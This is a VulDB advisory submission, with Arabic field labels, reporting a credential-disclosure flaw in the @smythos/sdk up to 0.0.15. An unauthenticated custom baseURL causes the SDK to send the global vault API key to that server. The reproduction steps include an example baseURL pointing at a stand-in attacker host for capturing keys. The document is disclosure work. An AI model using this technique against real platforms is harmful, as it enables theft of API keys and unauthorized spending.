| عنوان | smythos sdk <= 0.0.15 Credential Exposure / Information Disclosure (CWE-200) |
|---|
| الوصف | # Technical Details
An insecure credential fallback mechanism in the `@smythos/sdk` allows an internal or external attacker to stealthily steal highly sensitive system Vault API keys. If the SDK is initialized with an attacker-controlled `baseURL` and no credentials are explicitly provided, the framework automatically attaches the system's global Vault token (e.g., OpenAI or Anthropic keys) and sends it directly to the attacker's server.
# Vulnerable Code
File: packages/sdk/src/LLM/utils.ts
Method: adaptModelParams
Why: If the user omits the `credentials` or `apiKey` parameter, the function executes a "silent fallback" by aggressively setting the credentials array to `['vault']`. When `['vault']` is requested by the connector service upon request execution, the SRE environment (`ConnectorService.getVaultConnector()`) resolves it against the system-level `JSONFileVault` (typically loaded from `~/.smyth/vault.json`). This extraction completely bypasses any user origin or destination trust checks.
# Reproduction
1. Start an attacker server using express.js to intercept the API Key and log the `Authorization` header.
2. Initialize SRE Environment (`SRE.init()`) in a Node application that has access to the global vault configuration.
3. The attacker creates an LLM model pointing to their own server by supplying an external target via `baseURL: "http://attacker-controlled.com/v1"` without specifying an `apiKey`.
4. Trigger the LLM prompt. The SDK automatically attaches the Platform Vault Key and sends it to the attacker's server.
# Impact
- Critical exposure of Sensitive Information (Vault API Keys) to an Unauthorized Actor.
- Any multi-tenant platform integrating `@smythos/sdk` (where tenants can define a custom `baseURL`) is susceptible to comprehensive API key theft.
- Leads to severe financial loss due to unauthorized global LLM usage and provides a pivot for deeper organizational compromise.
|
|---|
| المصدر | ⚠️ https://gist.github.com/YLChen-007/3d35e0ce8197989ee4de4a93def30d47 |
|---|
| المستخدم | Eric-b (UID 96354) |
|---|
| ارسال | 06/04/2026 05:49 AM (22 أيام منذ) |
|---|
| الاعتدال | 25/04/2026 03:52 PM (19 days later) |
|---|
| الحالة | تمت الموافقة |
|---|
| إدخال VulDB | 359600 [SmythOS sre حتى 0.0.15 Connector Service utils.ts baseURL الكشف عن المعلومات] |
|---|
| النقاط | 20 |
|---|